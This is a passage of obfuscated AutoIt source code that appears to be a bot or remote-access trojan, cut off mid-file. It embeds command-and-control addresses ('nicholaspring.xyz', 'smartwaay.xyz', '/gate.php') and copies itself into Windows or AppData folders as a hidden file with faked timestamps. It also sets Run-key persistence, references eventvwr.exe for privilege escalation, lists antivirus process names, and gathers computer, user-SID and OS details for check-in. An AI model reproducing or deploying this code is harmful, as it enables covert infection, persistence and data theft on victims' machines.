AutoIT file

1. #NoTrayIcon
2. OnAutoItExitRegister("mAYpWE_UYZiHnDz")
3. ProcessSetPriority(@AutoItPID, 0)
4. Global $wpqhjjzjyuehnra = 0
5. Global $utbzbhfchfwaci81ut2vaxyj = ObjEvent(BinaryToString("0x4175746f49742e4572726f72"), "_MyEr" & "rF" & "unc")
6. Global Const $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[(2 + 0)][Int(ChrW("52"))] = [["nichol" & "aspring.x" & "yz:999" & "8", BinaryToString("0X2f676174652e706870", 1), BinaryToString(BinaryToString("0x30783339333436313636333033353336333133373636333436353330" & "3334333733393634333733363336363633343332333236363336333133313631" & "363433353633"), Int(Chr("49"))), "rk|zo|bf|dw|tf" & "|" & "it|" & "sk|vt|fj|aw|" & "ys|he" & "|yj|rt"], ["smartwa" & "ay." & "xyz:99" & "98", "/gate" & ".php", "94" & "af0" & "5617f4e0" & whmkkomlugeszcuofazuyripy_lpqlnzornvjlm() & "1ad5c", omqonkueyflthfeloopqjzyytqbxa_ussbwartdhxglxxtzqp()]]
7. Global Const $8plx7hqhds07a1upabrdcdzq3rowl2oxrlxjg93 = BinaryToString("0x73" & "7668" & eesacdgfyhvfvfyofjvhn_aqdptkinsnfnavyfgmowe() & "865")
8. Global Const $rsfy8xu2owgjzzpao1 = BinaryToString("0x57696e6" & jdqcjfagpdamtypfmszjphaexec() & "486f737420536572" & "76696365", Dec("1"))
9. Global Const $tpc6yucicwgqkh24xw3ovlr34y5ylijinmmbbx50npj0ac = ((1427 + -261527) / (-17 * 17))
10. Global Const $womb2ylp34fytistq70uddma0qzirctg9qv = wmewblbbsdpyhbwabpdeokiiaczmwc_ffi()
11. Global Const $6aqyz9pqwl9nfa = False
12. Global Const $hvviivj1dh7vcsmn0pvv6s = "1.1" & "." & "0"
13. Global Const $srqtxvmgtidcu2rvvjoas5esdrgjfmwel[14] = [0, ztqerabqikbldjzkht(), @ComputerName, atakiewionljgsuuxfxvrsnvsubjfjvoufparlmlcfw(), rbialzlemyv(), kpknyihasguuzcnpgh_ygtofoavhpciukxvxur(), cclkruvvit(), fxtypszalak_wovzpqvk_cabbwockiwvnhphgyloeyit(), gkwmmakclfebkghimfpthtxvuerfwzzsitggjuxm_g_vwtl(), pseqreglybhqq(), ibvdmowumouqexuaqhujgyxbndf(), kmhvbrvryeyqedovmbdbsbkilgmkcukdmmvk(), xnzijqdtgsqsvfznaqmcqxomjylhi(), $hvviivj1dh7vcsmn0pvv6s]
14. Global $zlbr6bdl1mpx5nytfs1owp086kb3oqnutrgd
15. If NOT @Compiled Then Exit
16. xgtmdyqpzrxaz(((4415212500000 / (-1761396 - (((-135 * -7) + (1592 + 599)) + 1553))) * -2))
17. smxjfdavhanpom()
18. If $cmdline[0] >= StringLen("F0") AND $cmdline[1] = BinaryToString(hyyskivghnxxdnyakergwecndfcdoefp()) Then FileDelete($cmdline[(((-1 - -2) - -1) + 0)])
19. bokfzmjaxngdfest(@ScriptFullPath)
20. _vwvaravzhqemcmjsvtcuxtztahpqgazredfwlqsmy($8plx7hqhds07a1upabrdcdzq3rowl2oxrlxjg93)
21. stvqetqqbhmugrymqjlizak_yukxjp_jxbsdbc(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
22. bkmjbpjydgpjezru(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
23. mxhcfimpbgdflxo(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
24. $zlbr6bdl1mpx5nytfs1owp086kb3oqnutrgd = lyvfhzaqwb_dh_wdcboierjjyaftpppootafhofnma($womb2ylp34fytistq70uddma0qzirctg9qv)
25. Do
26. xgtmdyqpzrxaz(Dec("4C4B40", 0))
27. Until mtfbsxdops()
28. mnsufddmgkzoilpokytyaenadbrdvdzw()
29.  
30. Func jqfjrgefxhqdfylsmemgfjelhqg()
31. Local $honvo6snua8bbde
32. $honvo6snua8bbde = "eventvwr.exe"
33. Return $honvo6snua8bbde
34. EndFunc
35.  
36. Func lxtnntsewvb()
37. Local $tcu7vqwfdfiupgigw83m8b = "0x2b525348"
38. Return $tcu7vqwfdfiupgigw83m8b
39. EndFunc
40.  
41. Func _ixyqesfzzyfsjthlbixz()
42. Return "33633"
43. EndFunc
44.  
45. Func aqsfjh_apecpsjimwcgda()
46. Local $yhrbavod83nzsplrojm8enwnuqqh = DllStructCreate(BinaryToString("0X44574F52443B44574F52443B5054523B5054523B44574F52445F5054523B44574F52443B44574F52443B44574F52443B574F52443B574F5244", (0 + Dec("1", 0))))
47. If @AutoItX64 AND @OSArch <> fdql_kfsdmdbvrs() Then
48. DllCall("kernel32.dll", "none", "GetNativeSystemInfo", "struct*", DllStructGetPtr($yhrbavod83nzsplrojm8enwnuqqh))
49. Else
50. DllCall("kernel32.dll", "none", "GetSystemInfo", "struct*", DllStructGetPtr($yhrbavod83nzsplrojm8enwnuqqh))
51. EndIf
52. If @error Then Return StringLen("c")
53. Return DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, 6)
54. EndFunc
55.  
56. Func boicqeamfinxvozzoxvvinokabyijaerbanxpf_ugy_efwtstz()
57. Return yztyxziqfquxjsxbnazibqiuotbyngsynzahzw()
58. EndFunc
59.  
60. Func zvlcwssldmugasag_vacflokicnkit()
61. Local $1bpf5gndfewor = odbwdthckanzhiurcsgerwf()
62. Return $1bpf5gndfewor
63. EndFunc
64.  
65. Func fyhtcqknnvyqupj_cgxhowajmf()
66. Local $olhoqhtgifpvtftbvzpoxoikgeonqy7yxsukc4yqeddyvb = "0X3A5222"
67. Return $olhoqhtgifpvtftbvzpoxoikgeonqy7yxsukc4yqeddyvb
68. EndFunc
69.  
70. Func samxpookfiehurh()
71. Return mefxpfswzswtjltataaxpbri()
72. EndFunc
73.  
74. Func tsaooquzydscefmkymbbhvkddbudtc_ijerzp()
75. Return "SizeOfImage"
76. EndFunc
77.  
78. Func quwr_cuqmepkglf()
79. Return gmofpv_lujjeuwieyzud()
80. EndFunc
81.  
82. Func cnjjtpqkz_camfbid()
83. Local $kfurjyt8ocftisotiywhw = wgszriylkcmzjmssqabzox()
84. Return $kfurjyt8ocftisotiywhw
85. EndFunc
86.  
87. Func slahotvinldyeippqggxgqslytgxrmokfmby()
88. Return "byte["
89. EndFunc
90.  
91. Func zxgmerfrsgboyotstop_ixnjnzoraurlhnccbizvn()
92. Return "byte Data["
93. EndFunc
94.  
95. Func jipksvyahlfvkhfdfxisspeevqxxixdklwgshutbvuxff()
96. Local $qxr594rqlm1ncmgfz2eop3goroju4uj6z6ufzww = foiswliiodpbwmwok()
97. Return $qxr594rqlm1ncmgfz2eop3goroju4uj6z6ufzww
98. EndFunc
99.  
100. Func aansg_xxrufwsrqikjgpwhsrjlejs()
101. Return "&"
102. EndFunc
103.  
104. Func lyvfhzaqwb_dh_wdcboierjjyaftpppootafhofnma($zcdawgatemcpqdmbhdj3y8lwchl1gbftwvpiildwbkic)
105. $zcdawgatemcpqdmbhdj3y8lwchl1gbftwvpiildwbkic = StringReplace($zcdawgatemcpqdmbhdj3y8lwchl1gbftwvpiildwbkic, BinaryToString(BinaryToString("0X30583563")), "")
106. Local $d7i9ogayra4np5rcdu97iup1vgfm1gmjvmglmyf9p8lp = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", ((0 + (((0 + 1) + 0) + -2)) / (-1 + 0)), "str", $zcdawgatemcpqdmbhdj3y8lwchl1gbftwvpiildwbkic)
107. Local $dzyi0zuzvyposjczbxttnasznqfmqiuxm = DllCall("kernel32.dll", "int", "GetLastError")
108. If $dzyi0zuzvyposjczbxttnasznqfmqiuxm[0] = Dec("B7") Then Exit
109. Return $d7i9ogayra4np5rcdu97iup1vgfm1gmjvmglmyf9p8lp[0]
110. EndFunc
111.  
112. Func jepxrkcfuyrxzfsmmbnhng()
113. Local $jkwj3sxl5l0tx1nucpbirr0mgn2lug8xwasktxi9gyirabg
114. $jkwj3sxl5l0tx1nucpbirr0mgn2lug8xwasktxi9gyirabg = "0x53697A654F6648656164657273"
115. Return $jkwj3sxl5l0tx1nucpbirr0mgn2lug8xwasktxi9gyirabg
116. EndFunc
117.  
118. Func xsnldvsghfqrnaziwurph_rwvjbmrdkhohwwnyzcrq()
119. Return "defwat"
120. EndFunc
121.  
122. Func ekvcpbkylj()
123. Local $vawm6hq1l6qzduagaxquk67h6psshxttxehgn9 = '" /' & "E /C /" & "G " & '"'
124. Return $vawm6hq1l6qzduagaxquk67h6psshxttxehgn9
125. EndFunc
126.  
127. Func mzecyhabmcizyfxvlourcffcdcbruycdwb($soexktxsq4k58q3jnd56lweggc, $wwxrvjeuw7p0sflhsnlscp5efczla8nefi1pegb = 32771)
128. Local $gtbvjnnyg8 = BinaryLen($soexktxsq4k58q3jnd56lweggc), $cqpuggiybplbcg7eapw6eoplw3gke, $8w7swnbsarf7bljuvm3lscae, $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk, $l0ogdusw5sah0 = "", $wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f = 0, $jnfv31wlaixdwkstuddxa = DllStructCreate("by" & "te[" & $gtbvjnnyg8 + ((1 + 0) + 0) & y_evhbxtkfwgubtphrqhnlpkscrshhpuotpajmno()), $i2uq02h1nonrro7
129. DllStructSetData($jnfv31wlaixdwkstuddxa, Int(ChrW("49")), $soexktxsq4k58q3jnd56lweggc)
130. $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("advapi32.dll", "int", "CryptAcquireContext", "ptr*", 0, "ptr", 0, "ptr", 0, "dword", StringLen("d"), "dword", -268435456)
131. If NOT @error AND $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[0] Then
132. $cqpuggiybplbcg7eapw6eoplw3gke = $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[Dec("1", 0)]
133. $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("advapi32.dll", "int", "CryptCreateHash", "ptr", $cqpuggiybplbcg7eapw6eoplw3gke, "dword", $wwxrvjeuw7p0sflhsnlscp5efczla8nefi1pegb, "ptr", 0, "dword", 0, "ptr*", 0)
134. If $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[0] Then
135. $8w7swnbsarf7bljuvm3lscae = $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[StringLen("?_Rvi")]
136. $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("advapi32.dll", "int", "CryptHashData", "ptr", $8w7swnbsarf7bljuvm3lscae, "ptr", DllStructGetPtr($jnfv31wlaixdwkstuddxa), "dword", $gtbvjnnyg8, "dword", 0)
137. If $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[0] Then
138. $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("advapi32.dll", "int", "CryptGetHashParam", "ptr", $8w7swnbsarf7bljuvm3lscae, "dword", ((0 + -1) * (((-1 / 1) + 0) + (0 - 1))), "ptr", 0, "int*", 0, "dword", 0)
139. $i2uq02h1nonrro7 = DllStructCreate("byt" & "e" & "[" & $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[4] & BinaryToString("0x" & "5d", 1))
140. DllCall("advapi32.dll", "int", "CryptGetHashParam", "ptr", $8w7swnbsarf7bljuvm3lscae, "dword", Int(ChrW("50")), "ptr", DllStructGetPtr($i2uq02h1nonrro7), "int*", $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[4], "dword", 0)
141. $l0ogdusw5sah0 = Hex(DllStructGetData($i2uq02h1nonrro7, (-1 - (0 + -2))))
142. Else
143. $wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f = Int(Chr("51"))
144. EndIf
145. DllCall("advapi32.dll", "int", "CryptDestroyHash", "ptr", $8w7swnbsarf7bljuvm3lscae)
146. Else
147. $wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f = 2
148. EndIf
149. DllCall("advapi32.dll", "int", "CryptReleaseContext", "ptr", $cqpuggiybplbcg7eapw6eoplw3gke, "dword", 0)
150. Else
151. $wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f = Dec("1")
152. EndIf
153. Return SetError($wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f, 0, StringLower($l0ogdusw5sah0))
154. EndFunc
155.  
156. Func fpwymajqzzqkowvzlqaajtd_akcwqyoephhdlxd()
157. Local $eidh2bcahn3fqoggohfjxueo8qgkwmpnu82h67vyqvnyuaw = "0X202F6320"
158. Return $eidh2bcahn3fqoggohfjxueo8qgkwmpnu82h67vyqvnyuaw
159. EndFunc
160.  
161. Func bnweiuxlxsjblshrwjzhneajmjkknlnknn_iknrxxjppfztqgo()
162. Local $rkvhv8lognumziod1chgphyejenolgmwnsaniwvk6muljn = "]"
163. Return $rkvhv8lognumziod1chgphyejenolgmwnsaniwvk6muljn
164. EndFunc
165.  
166. Func wmewblbbsdpyhbwabpdeokiiaczmwc_ffi()
167. Return "90" & "0"
168. EndFunc
169.  
170. Func dqxfslpnbuemcrgxagplmoyd_dqqnegeeznsydhb()
171. Local $6hl7josirljripuuluufpc6yttyoeij = ".lnk"
172. Return $6hl7josirljripuuluufpc6yttyoeij
173. EndFunc
174.  
175. Func cgyaodzdyfzpzytflyedsdstcmvgxetfciaszc()
176. Local $brzuvkvpy5nhun00vu0kpe27ucevr5kbtz8htozytkooufjs0
177. $brzuvkvpy5nhun00vu0kpe27ucevr5kbtz8htozytkooufjs0 = "0x307836343737366637323634323034333666366537343635373837343436366336313637373333623634373736663732363432303434373233303362323036343737366637323634323034343732333133623230363437373666373236343230343437323332336232303634373736663732363432303434373233333362323036343737366637323634323034343732333633623230363437373666373236343230343437323337336236343737366637323634323034333666366537343732366636633537366637323634336232303634373736663732363432303533373436313734373537333537366637323634336232303634373736663732363432303534363136373537366637323634336232303634373736663732363432303435373237323666373234663636363637333635373433623230363437373666373236343230343537323732366637323533363536633635363337343666373233623230363437373666373236343230343436313734363134663636363637333635373433623230363437373666373236343230343436313734363135333635366336353633373436663732336232303632373937343635323035323635363736393733373436353732343137323635363135623338333035643362323036343737366637323634323034333732333034653730373835333734363137343635336236343737366637323634323035333635363734373733336232303634373736663732363432303533363536373436373333623230363437373666373236343230353336353637343537333362323036343737366637323634323035333635363734343733336236343737366637323634323034353634363933623230363437373666373236343230343537333639336232303634373736663732363432303435363237383362323036343737366637323634323034353634373833623230363437373666373236343230343536333738336232303634373736663732363432303435363137383362363437373666373236343230343536323730336232303634373736663732363432303435363937303362323036343737366637323634323035333635363734333733336232303634373736663732363432303435343636633631363737333362323036343737366637323634323034353733373033623230363437373666373236343230353336353637353337333362363237393734363532303435373837343635366536343635363435323635363736393733373436353732373335623335333133323564"
178. Return $brzuvkvpy5nhun00vu0kpe27ucevr5kbtz8htozytkooufjs0
179. EndFunc
180.  
181. Func hpqrzftlekykdcvohfanyagilwgvisvgou_()
182. Local $vj7d5yx3lq7gx40oef
183. $vj7d5yx3lq7gx40oef = "fsav32.exe"
184. Return $vj7d5yx3lq7gx40oef
185. EndFunc
186.  
187. Func gpogoodvlz()
188. Return BinaryToString("0x5D", 1)
189. EndFunc
190.  
191. Func kjavlascotfsjjcnqepcvvftdcdqrkxyofgnmgnwmtobtwifw()
192. Return boicqeamfinxvozzoxvvinokabyijaerbanxpf_ugy_efwtstz()
193. EndFunc
194.  
195. Func tjsutkilvvikvlhprwl()
196. Return konyqusqkq_qcty_hkpqnpqbzfvzlcxze_nwm()
197. EndFunc
198.  
199. Func abftocaowtobwfyqzbnomwsfiunz()
200. Return fwhnpcoougjxlddfjoznzqtqlbwctprdsdvaud()
201. EndFunc
202.  
203. Func flflhsblpdpjipxofuh()
204. Local $eyphskobecjzkmdpmokq1iv5crvpobetergk = '","'
205. Return $eyphskobecjzkmdpmokq1iv5crvpobetergk
206. EndFunc
207.  
208. Func atakiewionljgsuuxfxvrsnvsubjfjvoufparlmlcfw()
209. Local $zaptcggm8sugcuw, $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd, $hprt2m0tvbtomv5vskkwnvv, $fz3eclo13c4hpsztvduuwn10gcs
210. While StringLen("j")
211. $fz3eclo13c4hpsztvduuwn10gcs += (1 + 0)
212. If @OSArch = jdzczmqtjmzmqepmsmkrdmxzrboakzth() OR @OSArch = BinaryToString(ks_tmbbcohmnojwvgvjjpboikjrqqlwoiuhfpmhibhkuupai(), 1) Then
213. $zaptcggm8sugcuw = RegEnumKey("HKEY_LOCAL_MACHINE64\SOFTWARE\Micro" & "soft\Windows N" & "T\CurrentVersion\ProfileList", $fz3eclo13c4hpsztvduuwn10gcs)
214. Else
215. $zaptcggm8sugcuw = RegEnumKey(raeay_odizwtovx(), $fz3eclo13c4hpsztvduuwn10gcs)
216. EndIf
217. If @error Then ExitLoop
218. If StringInStr($zaptcggm8sugcuw, gsvrgilpirrqddrbznmaewwoxdhudqe() & "5" & "-" & "21") > 0 Then
219. If @OSArch = BinaryToString(BinaryToString("0X3058353833363334", (1 + 0)), Dec("1", 0)) OR @OSArch = jipksvyahlfvkhfdfxisspeevqxxixdklwgshutbvuxff() Then
220. $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd = RegRead(utwzvlwnpjfcyysqnef_fajgswzbofkjhedzao_v() & $zaptcggm8sugcuw, zzhrcnq_fwbaelobsmnjjpovbirfjknocxl_kumlscerrsgyg())
221. Else
222. $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd = RegRead(BinaryToString(BinaryToString(sbenvtjps_llhlvtw()), 1) & $zaptcggm8sugcuw, BinaryToString(oluukgoeqwzedazpkiqudrgarqvbeoseuaybfuyf(), (((Int(ChrW("49")) - 2) / 1) / -1)))
223. EndIf
224. $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd = StringSplit($mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd, "\")
225. $hprt2m0tvbtomv5vskkwnvv &= $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd[$mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd[0]] & '"' & ',"'
226. EndIf
227. WEnd
228. Return yudegdcvnivlxsfkrhgsdpuctiguwhzeyxyovq_iz() & StringLeft($hprt2m0tvbtomv5vskkwnvv, StringLen($hprt2m0tvbtomv5vskkwnvv) - StringLen("iC")) & bnweiuxlxsjblshrwjzhneajmjkknlnknn_iknrxxjppfztqgo()
229. EndFunc
230.  
231. Func lhkdyhqgsnwgdzpdzsztrsglapgjcayfbpoe()
232. Local $yss6xhyd7m06kgiumtnoiikijp0i14ik
233. $yss6xhyd7m06kgiumtnoiikijp0i14ik = BinaryToString("0x5c536f6674776172655c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e5c", 1)
234. Return $yss6xhyd7m06kgiumtnoiikijp0i14ik
235. EndFunc
236.  
237. Func enrmlznxprgqt()
238. Return "HKEY_LOCAL_MACHINE"
239. EndFunc
240.  
241. Func rshhjjzjoqnrfvikbddmfoeyxfjzcbpobhgorsqhrv()
242. Return BinaryToString("0x202F46")
243. EndFunc
244.  
245. Func dyciwwrjojzbrsppftmchong_a()
246. Local $l0x1rtq0bs2hsp7lavofh0c5jasjc5ee7hzsbm0mzgix9lc9ug
247. $l0x1rtq0bs2hsp7lavofh0c5jasjc5ee7hzsbm0mzgix9lc9ug = BinaryToString("0x202f63206563686f20797c206361636c732e6578652022", 1)
248. Return $l0x1rtq0bs2hsp7lavofh0c5jasjc5ee7hzsbm0mzgix9lc9ug
249. EndFunc
250.  
251. Func cpttzgulsesxriwhs()
252. Return "WI" & "N" & "_XP"
253. EndFunc
254.  
255. Func _vwvaravzhqemcmjsvtcuxtztahpqgazredfwlqsmy($n4c3hqn4eib0zrsardsumi3)
256. If IsAdmin() = True Then
257. If @ScriptFullPath <> @WindowsDir & jkq_orgovsecuydujwgdz_bsqb() & $n4c3hqn4eib0zrsardsumi3 Then
258. If FileExists(@WindowsDir & ylpsnxwwmqxf() & $n4c3hqn4eib0zrsardsumi3) Then
259. kfryfuuq_aeiqzqc(@WindowsDir & bnlpzkechhfyauotjnrrclakycijdkbjoa_() & $n4c3hqn4eib0zrsardsumi3, False)
260. FileSetAttrib(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3, BinaryToString("0x2D525348"))
261. EndIf
262. FileCopy(@ScriptFullPath, @WindowsDir & BinaryToString(BinaryToString("0x30783543")) & $n4c3hqn4eib0zrsardsumi3, StringLen("9"))
263. bokfzmjaxngdfest(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3)
264. FileSetAttrib(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3, BinaryToString(BinaryToString("0x30583262353235333438")))
265. FileSetTime(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3, Random((((1109354 + (958209 + -3718234)) - -4748671) / 1549), ((((21 + 11) + -248) - (-217764 / (-212 + (-82 + 708)))) + ((190 - 443) + (980 * (-1 - -3)))), Int(Chr("49"))) & Random(((((-5 * StringLen("JzxxPB")) / 3) + (9 - Dec("13", 0))) / (0 - Dec("2"))), ((15 + ((266765400 / ((-20738440 * (1 + 2)) / ((-1745 + ((-5550 / 50) * 3)) * ((Dec("1") + (1 * (-4 / 2))) - 1)))) / 132)) / (((Int(ChrW("52")) / -1) / (Dec("2") - 0)) * 5)), 1) & Random(Dec("a", 0), ((6 - 17) + (-13 * -3)), (1 - 0)), StringLen("s"))
266. kfryfuuq_aeiqzqc(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3)
267. Run(zvlcwssldmugasag_vacflokicnkit() & @WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3 & BinaryToString("0x22202d642022", Int(ChrW("49"))) & @ScriptFullPath & BinaryToString(buvlnkhyhokev()))
268. Exit
269. EndIf
270. Else
271. If @ScriptFullPath <> @AppDataDir & tqndkbjzndxcqlnotvrehifjxuszgwhmzu() & $n4c3hqn4eib0zrsardsumi3 Then
272. If FileExists(@AppDataDir & BinaryToString("0X5C") & $n4c3hqn4eib0zrsardsumi3) Then
273. kfryfuuq_aeiqzqc(@AppDataDir & BinaryToString("0" & "x" & "5c") & $n4c3hqn4eib0zrsardsumi3, False)
274. FileSetAttrib(@AppDataDir & BinaryToString(rwhsslzitoetfswiuloifcmzvndt_alg()) & $n4c3hqn4eib0zrsardsumi3, iilyuxbwugiyndbi_snmefwtscqk_sxeccoijdjxbjbwevq())
275. EndIf
276. FileCopy(@ScriptFullPath, @AppDataDir & BinaryToString("0x" & "5C", Dec("1")) & $n4c3hqn4eib0zrsardsumi3, (0 - ((0 + -1) + 0)))
277. bokfzmjaxngdfest(@AppDataDir & "\" & $n4c3hqn4eib0zrsardsumi3)
278. FileSetAttrib(@AppDataDir & "\" & $n4c3hqn4eib0zrsardsumi3, BinaryToString(lxtnntsewvb()))
279. FileSetTime(@AppDataDir & etucwzrejgsaohyyngwcqpwbexyypvwcdvosoker() & $n4c3hqn4eib0zrsardsumi3, Random(2000, 2017, StringLen("w")) & Random(((((((0 - (Int(ChrW(49)) - 2)) + (1 - (-3 + Dec("7")))) + -7) / (3 - 0)) - ((((1 + 0) * -2) + 0) + (Int(ChrW(56)) / Dec("2")))) * -2), (StringLen("xA") + (((((-829472 * 4) / 1472) / (StringLen("BRct7!kMrEYw_RLxnxqNdNmdbjkU608dhx-L") - -10)) / Dec("7", 0)) - ((StringLen("S4Q") + (-4 + ((Dec("1") * Dec("2", 0)) + -15))) - Dec("3", 0)))), (0 - (-1 - 0))) & Random((90 / (StringLen("VTGBMjp9H") - 0)), ((182 / -13) * ((1 / -1) + (-1 / ((1 + -2) / ((-1 - 0) + 0))))), Dec("1")), StringLen("k"))
280. kfryfuuq_aeiqzqc(@AppDataDir & "\" & $n4c3hqn4eib0zrsardsumi3)
281. Run(rjobxxqrxdzlojrxrihhc_pwshhkcmgell_ilhndg() & @AppDataDir & ktlqhfvxfwwmyfcvkonutgvlgpzijyjjvkk() & $n4c3hqn4eib0zrsardsumi3 & '" -' & 'd "' & @ScriptFullPath & abftocaowtobwfyqzbnomwsfiunz())
282. Exit
283. EndIf
284. EndIf
285. EndFunc
286.  
287. Func rjwmrhlmatm_kqymunbmcrtqlxi()
288. Return "0x7274767363616e2e657865"
289. EndFunc
290.  
291. Func cclkruvvit()
292. Local $ungpqurvv2cnbvpineaqfzpxespfsqlzljp4 = MemGetStats()
293. Return $ungpqurvv2cnbvpineaqfzpxespfsqlzljp4[(1 - 0)]
294. EndFunc
295.  
296. Func feaeizqavjgibpxnqxqn_ltkbmg()
297. Local $irrvhrninzwkoreqfwkkplm4ohvveczrdiane13 = "0x436973747261792E657865"
298. Return $irrvhrninzwkoreqfwkkplm4ohvveczrdiane13
299. EndFunc
300.  
301. Func reffgukbceidox()
302. Local $adlpfg4xk8drajvt3 = "HK" & "EY_CURRENT_USE" & "R\Soft" & "ware\Microsoft\Windows\" & "CurrentVersion\R" & "un\"
303. Return $adlpfg4xk8drajvt3
304. EndFunc
305.  
306. Func ppexiuwxlsnolyxvz()
307. Local $akhbmw7loh6gdlnxtrykxkyrc
308. $akhbmw7loh6gdlnxtrykxkyrc = "vsstat.exe"
309. Return $akhbmw7loh6gdlnxtrykxkyrc
310. EndFunc
311.  
312. Func hyyskivghnxxdnyakergwecndfcdoefp()
313. Return mnwumtdbranfjd()
314. EndFunc
315.  
316. Func sctrlw_uspabvkwcwrpunedkkotxwp_mmjamcirofjdjbuv()
317. Return "byte["
318. EndFunc
319.  
320. Func fdql_kfsdmdbvrs()
321. Local $6fgemckyjnxzxvgbvi9puxfkgvaxsojfdh7tsexrovcudsh9
322. $6fgemckyjnxzxvgbvi9puxfkgvaxsojfdh7tsexrovcudsh9 = BinaryToString("0X583836")
323. Return $6fgemckyjnxzxvgbvi9puxfkgvaxsojfdh7tsexrovcudsh9
324. EndFunc
325.  
326. Func glgmpfzsipekhiwmtavlmgypd()
327. Local $9ewwnon9poxf4wwh1hxz53fe
328. $9ewwnon9poxf4wwh1hxz53fe = riglxmjnhpwm()
329. Return $9ewwnon9poxf4wwh1hxz53fe
330. EndFunc
331.  
332. Func ugwrxlngxiz()
333. Return ".exe"
334. EndFunc
335.  
336. Func fcylnepcxv_uzhufwnkljroccpcnsunjaluok()
337. Local $bsi9sgoqwx4z97j
338. $bsi9sgoqwx4z97j = nucbldtpuxmuekkoagchsndjpmwwupsxilqvhsp_dwpoeuhpmb()
339. Return $bsi9sgoqwx4z97j
340. EndFunc
341.  
342. Func jtwsvuynftmtffnqaf_yhukqcdwlzjbfochbvgbtyinf()
343. Return "0x532D312D352D33322D353435"
344. EndFunc
345.  
346. Func cjufzzbfcyuqponrezanouwiifqalgkrbijsp()
347. Return ':R"'
348. EndFunc
349.  
350. Func _olhkzgdboqxizulifnlxhawi()
351. If NOT IsObj($utbzbhfchfwaci81ut2vaxyj) Then Return False
352. Local $dzyi0zuzvyposjczbxttnasznqfmqiuxm = Hex($utbzbhfchfwaci81ut2vaxyj.number, ((7 + -15) + (Int(Chr("49")) - -15)))
353. If $dzyi0zuzvyposjczbxttnasznqfmqiuxm = 0 Then $dzyi0zuzvyposjczbxttnasznqfmqiuxm = -Int(Chr("49"))
354. $wpqhjjzjyuehnra = $dzyi0zuzvyposjczbxttnasznqfmqiuxm
355. EndFunc
356.  
357. Func rbialzlemyv()
358. Local $yhrbavod83nzsplrojm8enwnuqqh = DllStructCreate("DWORD;DWORD;DWOR" & BinaryToString("0X443b44574f52443b44574f") & "R" & "D;WC" & "HAR[128" & "];WORD;" & "WORD;WORD;BYTE;BYTE")
359. DllStructSetData($yhrbavod83nzsplrojm8enwnuqqh, ((0 - ((-1 - 0) / (0 + -1))) - ((1 + -2) + (-1 / 1))), DllStructGetSize($yhrbavod83nzsplrojm8enwnuqqh))
360. DllCall("ntdll.dll", "int", "RtlGetVersion", "ptr", DllStructGetPtr($yhrbavod83nzsplrojm8enwnuqqh))
361. If @error Then Return SetError(Dec("1"), @error, "Error calling RtlGetVersion")
362. Local $9yresluprghddgwblrac4rrxdajmxzcuyiu = DllCall("User32.dll", "int", "GetSystemMetrics", "int", 89)
363. If @error Then Return SetError((-1 + (Dec("9") / 3)), @error, "Error calling GetSystemMetrics")
364. Local $0anfbfiacxx = "[" & '"' & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, (1 * Dec("2", 0)))
365. $0anfbfiacxx &= flflhsblpdpjipxofuh() & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, 3)
366. $0anfbfiacxx &= '"' & ',"' & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, (Dec("1", 0) * (-3 + 7)))
367. $0anfbfiacxx &= '"' & ',"' & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, (StringLen("0mCPQgaY6k!B") / 2))
368. $0anfbfiacxx &= BinaryToString("0x222c22", StringLen("?")) & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, (5 + Dec("4", 0)))
369. $0anfbfiacxx &= qngvvwowsbiinfao_aanc_axaxtoqv_sfmnohc() & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, 10)
370. $0anfbfiacxx &= '"' & ',"' & $9yresluprghddgwblrac4rrxdajmxzcuyiu[0]
371. $0anfbfiacxx &= BinaryToString("0X225D", ((1 + -2) / (0 - StringLen("n"))))
372. Return $0anfbfiacxx
373. EndFunc
374.  
375. Func jxiwwibqksiitsmcweyfjpqnepklabadschr()
